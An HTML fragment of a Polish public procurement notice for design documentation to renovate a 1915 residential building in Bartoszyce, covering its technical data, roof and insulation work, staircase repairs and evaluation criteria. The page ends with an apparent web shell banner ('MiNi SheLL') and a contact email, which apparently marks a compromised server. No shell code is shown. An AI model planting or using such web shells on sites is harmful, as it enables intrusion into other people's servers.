</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Zadanie II
Opracowania dokumentacji projektowej na remont budynku mieszkalnego przy 	ul. Okrzei 	4 w Bartoszycach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4. Wytyczne do opracowania dokumentacji projektowej na remont budynku mieszkalnego przy ul. Okrzei 4.
Opis stanu istniejącego.
Budynek mieszkalny zbudowany w 1915 r częściowo podpiwniczony, murowany, dach dwuspadowy o konstrukcji płatwiowo-kleszczowej kryty dachówką ceramiczną strop nad piwnicą ceramiczny, 






stropy nad parterem i piętrem na belkach drewnianych, klatki schodowe drewniane, ogrzewanie lokali piece kaflowe na węgiel. Węzły sanitarne wspólnego użytkowania zlokalizowane na kl. schodowych.

Dane techniczne: 

I. Powierzchna zabudowy	183,75 m2
2.	Powierzchnia użytkowa	254,90 m2
3.	Kubatura	I 222,00 m3
4.	Ilość lokali	8
5.	Ilość kondygnacji	2 
Budynek wyposażony w następujące instalacje: 
instalacja elektryczna
instalacja gazowa
instalacja wod-kan włączona do miejskiej sieci

Zakresem prac remontowych:
I. Element robót - Remont dachu.
1.	Przemurowanie kominów ponad dachem z otynkowaniem.
2.	Wymiana tynków na kominach w części strychowej.
3.	Rozebranie pokrycia z dachówki ceramicznej.
4.	Wymiana zniszczonych elementów konstrukcji więźby dachowej stwierdzonych podczas sporządzania oględzin lub prowadzonych prac remontowych.
5.	Przełożenie pokrycia dachu z dachówki ceramicznej (rozbiórkowej) z wymianą łat i ułożeniem foli dachowej z wymianą zniszczonych obróbek blacharskich.
6.	Impregnacja konstrukcji więźby dachowej.
II. Element robót - Termomodernizacja budynku.
1.	Docieplenie ścian budynku płytami styropianowymi z ułożeniem wyprawy tynkarskiej.
2.	Wymiana stolarki okiennej z profili PCV w całości.
3 Wymiana stolarki drzwiowe) zewnętrznej z profili aluminiowych (wejście do I.I. schodowej).
4.	Docieplenie stropu nad piętrem wełną mineralną z wymianą podłogi ślepej.





III. Element robót - Remont klatki schodowej i pomieszczeń piwnicznych.
1.	Dostosowanie wewnętrznych linii zasilających instalacji elektrycznej do obowiązujących przepisów i norm.
2.	Wykonanie instalacji RTV.
3.	Modernizacja wspólnych pomieszczeń wc.
4.	Remont kl. schodowej z naprawą tynków posadzek biegów schodowych, robót malarskich.
5.	Remont pomieszczeń piwnicznych z wykonaniem ścianek działowych, tynków, posadzek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji zadania - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com